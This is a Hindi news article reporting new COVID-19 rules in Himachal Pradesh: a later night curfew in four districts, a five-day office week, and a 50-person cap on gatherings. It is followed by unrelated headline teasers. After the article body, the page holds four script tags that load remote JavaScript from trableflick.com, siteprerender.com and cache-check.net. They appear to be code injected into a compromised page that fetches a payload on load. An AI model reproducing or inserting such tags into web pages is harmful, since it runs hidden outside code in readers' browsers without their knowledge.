<p>सरकार ने कोविड-19 को लेकर एक बार फ़िर से नियम बदल दिए हैं। मुख्यमंत्री की अध्यक्षता में कोविड को लेकर हुई समीक्षा बैठक में अब कई निर्णय लिए गए हैं। प्रदेश के चार जिलों कांगड़ा, मंडी, शिमला और कुल्लू में अब नाईट कर्फ्यू रात 8 बजे के बजाए 9 बजे से सुबह छः बजे तक रहेगा। यानी कि कर्फ्यू में अब एक घण्टे ज़्यादा छूट रहेगी।</p>
<p>मुख्यमंत्री जयराम ठाकुर ने बताया कि दफ्तरों में कर्मचारियों के लिए अब 6 के बजाए 5 डे वीक होगा। हर शनिवार "वर्क फ्रोम होम" होगा बाक़ी दिनों में अब पूरे स्टॉफ के साथ काम होगा, जो पहले 50-50 के तहत था। अब सदियों सहित अन्य समारोहों में 50 लोगों से ज़्यादा की भीड़ नहीं जुट पाएगी। अब इनडोर और आउटडोर दोनों ही तरह के समारोहों में सिर्फ़ 50 लोगों को ही एकत्रित होने की इजाज़त होगी। इससे पहले इनडोर में 100 और आउटडोर में 200 लोगों के शामिल होने की छूट थी।</p>
<p>गौरतलब है कि हिमाचल प्रदेश में लगातार कोरोना के मामले बढ़ रहे है। अभी तक प्रदेश में कारोना का आंकड़ा 38 हज़ार को पार कर गया है जबकि 600 से ज़्यादा लोगों को मौत हो चुकी है। अकेले नवंबर माह में ही 300 से ज़्यादा मौतें हो चुकी है।</p>
<p> </p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1606557492328″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
सवाल नगर निगम ने खुद 7000 अवैध निर्माण चिन्हित किया था। क्या सब पर बुलडोजर…
New Delhi: आम आदमी पार्टी (AAP) के राष्ट्रीय संयोजक अरविंद केजरीवाल ने राष्ट्रीय स्वयंसेवक…
Mandi: मंडी की सांसद और अभिनेत्री कंगना रनौत ने कृषि कानून पर दिए गए…
Mandi: मंडी की सांसद और अभिनेत्री कंगना रनौत ने कृषि कानून पर दिए गए बयान…
Shimla: दिल्ली हाईकोर्ट के न्यायाधीश राजीव शकधर ने आज हिमाचल प्रदेश हाईकोर्ट के मुख्य न्यायाधीश…
मौसम की बेरुखी के चलते विदेशी पायलटों ने नहीं दी दस्तक रोजाना मात्र 40…